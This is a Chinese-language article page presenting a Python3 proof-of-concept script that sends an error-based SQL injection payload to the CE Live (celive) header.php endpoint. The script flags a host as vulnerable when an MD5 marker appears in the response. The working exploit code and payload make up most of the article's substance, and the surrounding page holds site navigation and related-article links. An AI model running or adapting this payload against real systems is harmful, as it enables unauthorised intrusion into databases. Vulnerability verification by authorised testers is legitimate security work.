iis服务器助手广告

扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 后端开发 > Python >Python3实现PoC——wooyun
  • 158

0
分享到

Python3实现PoC——wooyun

PoCwooyun 2023-01-31 08:01:03 158人浏览 泡泡鱼

Python 官方文档:入门教程 => 点击学习

摘要

一、演示一下的利用效果二、漏洞说明这次的PoC是验证sql注入,漏洞详情三、代码+注释import requests import argparse parser = argparse.ArgumentParser() parser.ad

一、演示一下的利用效果

wKiom1hWiDzgtRddAAEafL05SRs942.png


二、漏洞说明

这次的PoC是验证sql注入,漏洞详情


三、代码+注释

import requests
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('-u', dest="url")
args = parser.parse_args()
url = args.url

# 存在漏洞的页面
url += "/celive/live/header.PHP"
# 构造payload,用md5结果来验证
payload = {
    'xajax': 'LiveMessage',
    'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),"
                          "concat(floor(rand(0)*2),(select md5(888)))a"
                          " from infORMation_schema.tables group by a)b)"
                          ",'','','','1','127.0.0.1','2') #"
}

try:
    r = requests.post(url, data=payload)
    if(r.status_code == requests.codes.ok):
        if "0a113ef6b61820daa5611c870ed8d5ee" in r.text:
            print("{} is SQL_vul".format(url))
        else:
            print("{} is not SQL_vul".format(url))
except Exception as e:
    print(str(e))


您可能感兴趣的文档:
点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: Python3实现PoC——wooyun

本文链接: https://www.lsjlt.com/news/192606.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
去做题
猜你喜欢
  • Python3实现PoC——wooyun
    一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释import requests import argparse parser = argparse.ArgumentParser() parser.ad...
    99+
    2023-01-31
    PoC wooyun
  • Python3实现PoC——CVE-20
    一、演示一下CVE-2014-6271的利用效果二、代码+注释import requests import argparse # 获取参数 parser = argparse.ArgumentParser() parser.add_arg...
    99+
    2023-01-31
    PoC CVE
  • Python3实现——反弹shell
    一、演示一下反弹shell的效果0、看一下python版本1、我们这边是服务端客户端连接后就可以输入命令了,比如下面截图中输入的pwd2、目标机是客户端,输入ip和端口二、代码+注释0、服务端1、客户端...
    99+
    2023-01-31
    shell
  • python3 socket实现简单
    #!/usr/bin/env python# -- encoding: utf-8 --'''@Author : {liush}@License : (C) Copyright 2018-2037, {liush}@Contact...
    99+
    2023-01-31
    简单 socket
  • Python3 完整实现DNN
        完整实现DNN,包括前向传播和反向传播。实现一个2次函数的拟合。#!/usr/bin/env python3 # -*- coding: ut...
    99+
    2023-01-31
    完整 DNN
  • Python3实现验证码
    一:准备工作,需要安装PIL,安装方式,pip install Pillow 二:具体实现 #!/usr/bin/env python3 # coding:UTF-8 """" 文件说明: """ from PIL import I...
    99+
    2023-01-31
    验证码
  • python3多进程实现
    python多进程的主要方式有两种,一种是使用os模块的fork方法,另一种方法是使用multiprocessing模块,这两种方法的就别在于前者仅适用于Unix/Linux操作系统,后者是跨平台的实现方式 1.使用fork方法实...
    99+
    2023-01-31
    进程
  • flask + Python3 实现的的
    **背景: 1.平时测试接口,总是现写代码,对测试用例的管理,以及测试报告的管理持久化做的不够,2.工作中移动端开发和后端开发总是不能并行进行,需要一个mock的依赖来让他们并行开发。3.同时让自己锻炼去开发测试平台,掌握flask开发程序...
    99+
    2023-01-31
    flask
  • python3实现单例模式
    单例模式指确保某个类在整个系统中只存在一个实例的一种设计模式使用单例模式的好处:1、每个实例都会占用一定的内存资源,且初始化实例时会影响运行性能,所以当整个系统只需一个实例时,使用单例模式不仅可减少资源占用,而且因为只初始化一次,还可以加...
    99+
    2023-01-31
    模式
  • DES算法的python3实现
    DES原理 这里不予以复述, 有很多优秀的博客 原理可以参考这篇博客 https://www.cnblogs.com/songwenlong/p/5944139.html 1. 主函数框架 DES 函数 传入参数为 tex...
    99+
    2023-01-31
    算法 DES
  • Python实现POC漏洞批量验证程序的脚本怎么写
    这篇文章主要介绍“Python实现POC漏洞批量验证程序的脚本怎么写”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“Python实现POC漏洞批量验证程序的脚本怎么写”文章能帮助大家解决问题。需求分析...
    99+
    2023-06-29
  • Python3 解释器的实现
    Linux/Unix的系统上,一般默认的 python 版本为 2.x,我们可以将 python3.x 安装在 /usr/local/python3 目录中。 安装完成后,我们可以将...
    99+
    2024-04-02
  • Python3实现求质因数
    编写函数,接受一个整数,返回改数的所有质因子。调用该函数进行求解测试。 import math x = input("请输入一个整数,例如demo(15):\n") def demo(n): r = [] l ...
    99+
    2023-01-31
    质因数
  • python3 pymysql实现事务处
    try:     cursor.execute(sql_1)       cursor.execute(sql_2)       cursor.execute(sql_3)   except Exception as e:     conn...
    99+
    2023-01-31
    事务处 pymysql
  • python3中cmp如何实现
    这篇文章主要为大家展示了“python3中cmp如何实现”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“python3中cmp如何实现”这篇文章吧。python3 cmp实现python3移除了c...
    99+
    2023-06-29
  • python3 chromedrivers签到如何实现
    这篇文章主要讲解了“python3 chromedrivers签到如何实现”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“python3 chromedrivers签到如何...
    99+
    2023-07-05
  • python3实现倒计时效果
    本文实例为大家分享了python3实现倒计时效果的具体代码,供大家参考,具体内容如下 # CountDown.py import turtle,time def drawGap(...
    99+
    2024-04-02
  • Python3 实现递归求阶乘
    题目 利用递归方法求5! 程序分析 递归调用即可。 def factorial(n): return n*factorial(n-1) if n>1 else 1 pri...
    99+
    2024-04-02
  • phpStudy poc漏洞复现以及漏洞修复办法
    phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响...
    99+
    2023-06-03
  • Python3实现简单的http ser
    前端的开发的html给我们的时候,由于内部有一些ajax请求的.json的数据,需要在一个web server中查看,每次放到http服务器太麻烦。还是直接用python造一个最方便。 最简单的,直接用python3 -m http.se...
    99+
    2023-01-31
    简单 ser http
软考高级职称资格查询
iis服务器助手广告
软考职称历年真题下载
软考职称资料下载
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作